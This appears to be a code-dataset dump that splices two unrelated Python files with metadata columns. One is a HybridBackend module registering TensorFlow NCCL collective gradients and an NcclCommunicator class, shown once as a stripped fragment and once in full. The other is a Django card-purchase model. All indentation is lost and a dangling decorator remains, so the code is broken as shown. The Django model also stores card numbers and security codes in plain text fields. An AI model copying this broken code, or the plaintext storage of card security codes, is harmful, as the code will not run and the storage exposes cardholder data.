reduce_op = op.get_attr('reduce_op')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.allreduce_with_nccl_comm(
comm, grad_in, reduce_op=reduce_op)
return None, grad_out
ops.NotDifferentiable('BroadcastWithNcclComm')
ops.NotDifferentiable('ScatterWithNcclComm')
ops.NotDifferentiable('GatherWithNcclComm')
ops.NotDifferentiable('GathervWithNcclComm')
@ops.RegisterGradient('AllgatherWithNcclComm')
def _allgather_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL allgather op.
'''
comm = op.inputs[0]
grad_in = args[0]
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.reduce_scatter_with_nccl_comm(
comm, grad_in, reduce_op=CollectiveOps.SUM)
return None, grad_out
ops.NotDifferentiable('AllgathervWithNcclComm')
@ops.RegisterGradient('AlltoallWithNcclComm')
def _alltoall_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL alltoall op.
'''
comm = op.inputs[0]
grad_in = args[0]
wire_dtype = op.get_attr('wire_dtype')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.alltoall_with_nccl_comm(
comm, grad_in,
wire_dtype=wire_dtype)
return None, grad_out
@ops.RegisterGradient('AlltoallvWithNcclComm')
def _nccl_alltoallv_grad(op, *args):
r'''Gradient for NCCL alltoallv op.
'''
comm = op.inputs[0]
grad_in = list(args)[0]
grad_sizes_in = op.outputs[1]
common_shape = op.get_attr('common_shape')
wire_dtype = op.get_attr('wire_dtype')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out, grad_sizes_out = _ops.alltoallv_with_nccl_comm(
comm, grad_in, grad_sizes_in,
wire_dtype=wire_dtype,
common_shape=common_shape)
return None, grad_out, grad_sizes_out
@ops.RegisterGradient('GroupAlltoallvWithNcclComm')
def _group_alltoallv_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL group_alltoallv op.
'''
comm = op.inputs[0]
num_columns = op.get_attr('num_columns')
wire_dtype = op.get_attr('wire_dtype')
common_shapes = op.get_attr('common_shapes')
grad_in = args[:num_columns]
grad_sizes_in = op.outputs[num_columns:]
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out, _ = _ops.group_alltoallv_with_nccl_comm(
comm, grad_in, grad_sizes_in,
wire_dtype=wire_dtype,
common_shapes=common_shapes)
return (None, *grad_out, *[None for _ in range(num_columns)])
@ops.RegisterGradient('AlltoallwWithNcclComm')
def _alltoallw_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL alltoallw op.
'''
comm = op.inputs[0]
common_shape = op.get_attr('common_shape')
wire_dtype = op.get_attr('wire_dtype')
grad_in = list(args)
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.alltoallw_with_nccl_comm(
comm, grad_in,
wire_dtype=wire_dtype,
common_shape=common_shape)
return [None] + grad_out
@ops.RegisterGradient('GroupAlltoallwWithNcclComm')
def _group_alltoallw_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL group_alltoallw op.
'''
comm = op.inputs[0]
num_columns = op.get_attr('num_columns')
wire_dtype = op.get_attr('wire_dtype')
common_shapes = op.get_attr('common_shapes')
grad_in = list(args)
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.group_alltoallw_with_nccl_comm(
comm, grad_in,
num_columns=num_columns,
wire_dtype=wire_dtype,
common_shapes=common_shapes)
return [None] + grad_out
class NcclCommunicator(Communicator):
r'''A communicator using NCCL.
'''
NAME = 'NCCL'
@classmethod
Communicator.register(NcclCommunicator)
| 31.454259 | 79 | 0.726407 | # Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
r'''NCCL based collective commmunication.
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.platform import tf_logging as logging
from hybridbackend.tensorflow.distribute.communicator import CollectiveOps
from hybridbackend.tensorflow.distribute.communicator import Communicator
from hybridbackend.tensorflow.distribute.pubsub import PubSub
from hybridbackend.tensorflow.pywrap import _ops
ops.NotDifferentiable('GetNcclId')
ops.NotDifferentiable('NcclComm')
ops.NotDifferentiable('CreateNcclComm')
ops.NotDifferentiable('IsNcclCommInitialized')
@ops.RegisterGradient('ReduceWithNcclComm')
def _reduce_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL reduce op.
'''
comm = op.inputs[0]
grad_in = args[0]
reduce_op = op.get_attr('reduce_op')
root_rank = op.get_attr('root_rank')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.broadcast_with_nccl_comm(
comm, grad_in, root_rank=root_rank)
return None, grad_out
@ops.RegisterGradient('ReduceScatterWithNcclComm')
def _reduce_scatter_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL reduce scatter op.
'''
comm = op.inputs[0]
grad_in = args[0]
reduce_op = op.get_attr('reduce_op')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.allgather_with_nccl_comm(comm, grad_in)
return None, grad_out
@ops.RegisterGradient('AllreduceWithNcclComm')
def _allreduce_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL allreduce op.
'''
comm = op.inputs[0]
grad_in = args[0]
reduce_op = op.get_attr('reduce_op')
if reduce_op != CollectiveOps.SUM:
raise NotImplementedError(
'Only reduce_op=SUM is supported for gradients computation.')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.allreduce_with_nccl_comm(
comm, grad_in, reduce_op=reduce_op)
return None, grad_out
ops.NotDifferentiable('BroadcastWithNcclComm')
ops.NotDifferentiable('ScatterWithNcclComm')
ops.NotDifferentiable('GatherWithNcclComm')
ops.NotDifferentiable('GathervWithNcclComm')
@ops.RegisterGradient('AllgatherWithNcclComm')
def _allgather_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL allgather op.
'''
comm = op.inputs[0]
grad_in = args[0]
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.reduce_scatter_with_nccl_comm(
comm, grad_in, reduce_op=CollectiveOps.SUM)
return None, grad_out
ops.NotDifferentiable('AllgathervWithNcclComm')
@ops.RegisterGradient('AlltoallWithNcclComm')
def _alltoall_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL alltoall op.
'''
comm = op.inputs[0]
grad_in = args[0]
wire_dtype = op.get_attr('wire_dtype')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.alltoall_with_nccl_comm(
comm, grad_in,
wire_dtype=wire_dtype)
return None, grad_out
@ops.RegisterGradient('AlltoallvWithNcclComm')
def _nccl_alltoallv_grad(op, *args):
r'''Gradient for NCCL alltoallv op.
'''
comm = op.inputs[0]
grad_in = list(args)[0]
grad_sizes_in = op.outputs[1]
common_shape = op.get_attr('common_shape')
wire_dtype = op.get_attr('wire_dtype')
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out, grad_sizes_out = _ops.alltoallv_with_nccl_comm(
comm, grad_in, grad_sizes_in,
wire_dtype=wire_dtype,
common_shape=common_shape)
return None, grad_out, grad_sizes_out
@ops.RegisterGradient('GroupAlltoallvWithNcclComm')
def _group_alltoallv_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL group_alltoallv op.
'''
comm = op.inputs[0]
num_columns = op.get_attr('num_columns')
wire_dtype = op.get_attr('wire_dtype')
common_shapes = op.get_attr('common_shapes')
grad_in = args[:num_columns]
grad_sizes_in = op.outputs[num_columns:]
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out, _ = _ops.group_alltoallv_with_nccl_comm(
comm, grad_in, grad_sizes_in,
wire_dtype=wire_dtype,
common_shapes=common_shapes)
return (None, *grad_out, *[None for _ in range(num_columns)])
@ops.RegisterGradient('AlltoallwWithNcclComm')
def _alltoallw_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL alltoallw op.
'''
comm = op.inputs[0]
common_shape = op.get_attr('common_shape')
wire_dtype = op.get_attr('wire_dtype')
grad_in = list(args)
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.alltoallw_with_nccl_comm(
comm, grad_in,
wire_dtype=wire_dtype,
common_shape=common_shape)
return [None] + grad_out
@ops.RegisterGradient('GroupAlltoallwWithNcclComm')
def _group_alltoallw_with_nccl_comm_grad(op, *args):
r'''Gradient for NCCL group_alltoallw op.
'''
comm = op.inputs[0]
num_columns = op.get_attr('num_columns')
wire_dtype = op.get_attr('wire_dtype')
common_shapes = op.get_attr('common_shapes')
grad_in = list(args)
with ops.device(op.device):
with ops.control_dependencies(op.outputs):
grad_out = _ops.group_alltoallw_with_nccl_comm(
comm, grad_in,
num_columns=num_columns,
wire_dtype=wire_dtype,
common_shapes=common_shapes)
return [None] + grad_out
class NcclCommunicator(Communicator):
r'''A communicator using NCCL.
'''
NAME = 'NCCL'
@classmethod
def compute_pool_capacity(cls, capacity=None):
if capacity is not None and capacity != 1:
logging.warning('Multiple-communicators pooling is unsafe.')
return capacity or 1
def _build_handle(self):
return _ops.nccl_comm_handle_op(shared_name=self.shared_name)
def _build_create_op(self):
nccl_id = PubSub(self.devices)(
_ops.get_nccl_id,
tensor_shape.TensorShape([16]), # 128 / 8
dtypes.int64,
name=f'{self.shared_name}/nccl_id')
return _ops.create_nccl_comm(
self.handle, nccl_id,
size=self.size,
rank=self.rank,
shared_name=self.shared_name)
def _build_is_initialized_op(self):
return _ops.is_nccl_comm_initialized(self.handle)
def _reduce(self, value, reduce_op, root_rank, name):
return _ops.reduce_with_nccl_comm(
self.handle, value,
reduce_op=reduce_op,
root_rank=root_rank,
name=name)
def _reduce_scatter(self, value, reduce_op, name):
return _ops.reduce_scatter_with_nccl_comm(
self.handle, value,
reduce_op=reduce_op,
name=name)
def _allreduce(self, value, reduce_op, name):
return _ops.allreduce_with_nccl_comm(
self.handle, value,
reduce_op=reduce_op,
name=name)
def _broadcast(self, value, root_rank, name):
return _ops.broadcast_with_nccl_comm(
self.handle, value,
root_rank=root_rank,
name=name)
def _scatter(self, value, root_rank, name):
raise NotImplementedError
def _gather(self, value, root_rank, name):
raise NotImplementedError
def _gatherv(self, value, root_rank, name):
raise NotImplementedError
def _allgather(self, value, name):
return _ops.allgather_with_nccl_comm(self.handle, value, name=name)
def _allgatherv(self, value, name):
return _ops.allgatherv_with_nccl_comm(self.handle, value, name=name)
def _alltoall(self, value, wire_dtype, name, **kwargs):
return _ops.alltoall_with_nccl_comm(
self.handle, value,
wire_dtype=wire_dtype,
name=name)
def _alltoallv(self, value, sizes, wire_dtype, common_shape, name, **kwargs):
return _ops.alltoallv_with_nccl_comm(
self.handle, value, sizes,
common_shape=common_shape,
wire_dtype=wire_dtype,
name=name)
def _group_alltoallv(
self, values, sizes, wire_dtype, common_shapes, name, **kwargs):
return _ops.group_alltoallv_with_nccl_comm(
self.handle, values, sizes,
common_shapes=common_shapes,
wire_dtype=wire_dtype,
name=name)
def _alltoallw(self, values, wire_dtype, common_shape, name, **kwargs):
return _ops.alltoallw_with_nccl_comm(
self.handle, values,
common_shape=common_shape,
wire_dtype=wire_dtype,
name=name)
def _group_alltoallw(
self, group_values, wire_dtype, common_shapes, name, **kwargs):
flatten_results = _ops.group_alltoallw_with_nccl_comm(
self._handle,
sum(group_values, []),
num_columns=len(group_values),
wire_dtype=wire_dtype,
common_shapes=common_shapes)
results = []
for v in flatten_results:
if results and len(results[-1]) < self.size:
results[-1].append(v)
else:
results.append([v])
return results
Communicator.register(NcclCommunicator)
| 2,788 | 0 | 449 |
e109bc196fb1f2d1fb3f57f50d8c167eee60e087 | 1,334 | py | Python | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | null | null | null | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | 7 | 2019-08-22T23:45:07.000Z | 2021-06-09T18:17:44.000Z | cielo/models.py | CharlesTenorio/strive_api | 27650f36df56d9ea3299bafa9e077f58ce68368c | [
"MIT"
] | null | null | null | from django.db import models
BANDEIRA_CHOICES = (
('Visa', 'Visa'),
('Master', 'Master'),
('Hipercard', 'Hipercard'),
('Hiper', 'Hiper'),
('American Express', 'American Express'),
('Elo', 'Elo'),
('Diners Club', 'Diners Club'),
('American Express', 'American Express'),
('Discover', 'Discover'),
('JCB', 'JCB'),
('Aura', 'Aura'),
)
| 40.424242 | 89 | 0.663418 | from django.db import models
BANDEIRA_CHOICES = (
('Visa', 'Visa'),
('Master', 'Master'),
('Hipercard', 'Hipercard'),
('Hiper', 'Hiper'),
('American Express', 'American Express'),
('Elo', 'Elo'),
('Diners Club', 'Diners Club'),
('American Express', 'American Express'),
('Discover', 'Discover'),
('JCB', 'JCB'),
('Aura', 'Aura'),
)
class ComprarCredito(models.Model):
id_compra = models.PositiveIntegerField(default=10, blank=True, null=True)
cliente = models.CharField(max_length=80, blank=True, null=True)
numero_cartao = models.CharField(max_length=50, blank=True, null=True)
seguranca = models.CharField(max_length=10, blank=True, null=True)
bandeira = models.CharField(max_length=80, choices=BANDEIRA_CHOICES)
validade = models.CharField(max_length=8, null=True, blank=True)
valor = models.PositiveIntegerField(default=100, blank=True, null=True)
qtd_parcela = models.PositiveIntegerField(default=1, blank=True, null=True)
codigo_trasacao = models.CharField(max_length=80, default='0', blank=True, null=True)
statu_trasacao = models.CharField(max_length=300, blank=True, null=True)
data_compra = models.DateTimeField(auto_now_add=True)
class Meta:
ordering = ('-data_compra',)
| 0 | 885 | 23 |